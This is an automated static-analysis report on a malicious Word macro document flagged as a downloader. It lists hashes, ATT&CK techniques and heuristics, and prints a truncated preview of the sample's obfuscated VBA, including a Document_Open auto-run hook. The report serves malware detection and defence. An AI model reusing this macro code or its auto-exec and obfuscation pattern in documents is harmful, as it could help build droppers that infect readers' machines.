Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 10f823a04abaaddd…

MALICIOUS

Office (OOXML)

191.9 KB Created: 2019-11-01 07:42:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2020-07-24
MD5: e5aad7d75d6a9da92ca8d16cc8195aab SHA-1: 301d3e98c840c298eb93b1f7fd18bea21e052d2a SHA-256: 10f823a04abaaddd0e0e85cf723380539408c462e28b9c712b6a561515a9de7e
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

This OOXML document contains a VBA project with a Document_Open macro that executes obfuscated code. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is likely used to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature as a downloader. The VBA code itself is heavily obfuscated and truncated, preventing a more detailed analysis of its specific actions.

Heuristics 6

  • ClamAV: Doc.Downloader.Generic-8011192-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 48020 bytes
SHA-256: 43c9ad5f3ce814626c1fb963420b9fe097f0184b606bd1b7e2d2ac434810cda6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    hsdfjh34j5k.ncjjkj34SD4
End Sub

Attribute VB_Name = "hsdfjh34j5k"
Private Type DSFG36SDFGsfj2bhnkijb345
    dsgf4 As Long
    dg43t4 As String
    hj56y As Long
'    nbk54 As Long
'    ngi24 As Long
    dwXCars As Long
    cerved2 As Integer
    htput As Long
    hror As Long
End Type

Private Type DFG546CV345rpaoisdfgi34
    hess As Long
'    ead As Long
    ocessD As Long
    hPrss As Long
    hhad As Long
    deadI As Long
End Type

#If VBA7 Then
Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal fkjn54lk4nlws As LongPtr, ByVal cbkjwhefkjhv4j3rhvw As LongPtr) As LongPtr
Declare PtrSafe Function AnyPopup Lib "user32" () As LongPtr
Declare PtrSafe Function AttachThreadInput Lib "user32" (ByVal idAttach As LongPtr, ByVal idAttachTo As LongPtr, ByVal fAttach As LongPtr) As LongPtr
Declare PtrSafe Function BeginDeferWindowPos Lib "user32" (ByVal nNumWindows As LongPtr) As LongPtr
Declare PtrSafe Function CloseWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CopyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function CountClipboardFormats Lib "user32" () As LongPtr
Declare PtrSafe Function CreateCaret Lib "user32" (ByVal hWnd As LongPtr, ByVal hBitmap As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr) As LongPtr
Declare PtrSafe Function CreateIcon Lib "user32" (ByVal hsdfkjo3lw4h5o3ghkijfs As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal nPlanes As Byte, ByVal nBitsPixel As Byte, lpANDbits As Byte, lpXORbits As Byte) As LongPtr
'Declare PtrSafe Function CreateIconFromResource Lib "user32" (presbits As Byte, ByVal dwResSize As LongPtr, ByVal fIcon As LongPtr, ByVal dwVer As LongPtr) As LongPtr
'Declare PtrSafe Function CreateMDIWindow Lib "user32" Alias "CreateMDIWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hInstance As LongPtr, ByVal lParam As LongPtr) As LongPtr
'Declare PtrSafe Function CreateMenu Lib "user32" () As LongPtr
'Declare PtrSafe Function CreatePopupMenu Lib "user32" () As LongPtr
'Declare PtrSafe Function CreateWindow Lib "user32" Alias "CreateWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hMenu As LongPtr, ByVal hInstance As LongPtr, lpParam As Any) As LongPtr
'Declare PtrSafe Function DdeAddData Lib "user32" Alias "DdeAddDataA" (ByVal hData As LongPtr, pSrc As Byte, ByVal cb As LongPtr, ByVal cbOff As LongPtr) As LongPtr
'Declare PtrSafe Function DdeClientTransaction Lib "user32" (pData As Byte, ByVal cbData As LongPtr, ByVal hConv As LongPtr, ByVal hszItem As LongPtr, ByVal wFmt As LongPtr, ByVal wType As LongPtr, ByVal dwTimeout As LongPtr, pdwResult As LongPtr) As LongPtr
'Declare PtrSafe Function DdeDisconnect Lib "user32" (ByVal hConv As LongPtr) As LongPtr
'Declare PtrSafe Function DdeDisconnectList Lib "user32" (ByVal hConvList As LongPtr) As LongPtr
'Declare PtrSafe Function DdeEnableCallback Lib "user32" (ByVal idInst As LongPtr, ByVal hConv As LongPtr, ByVal wCmd As LongPtr) As LongPtr
'Declare PtrSafe Function DdeFreeDataHandle Lib "user32" (ByVal hData As LongPtr) As LongPtr
'Declare PtrSafe Function DdeFreeStringHandle Lib "user32" (ByVal idInst As LongPtr, ByVal hsz As LongPtr) As LongPtr
'Declare PtrSafe Function DdeGetDat
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 153088 bytes
SHA-256: 0c5d6c5d860d97cb70b151f3382d396798b88b167abd51be43954a15f7785777
Detection
ClamAV: Doc.Downloader.Generic-8011192-0
Obfuscation or payload: unlikely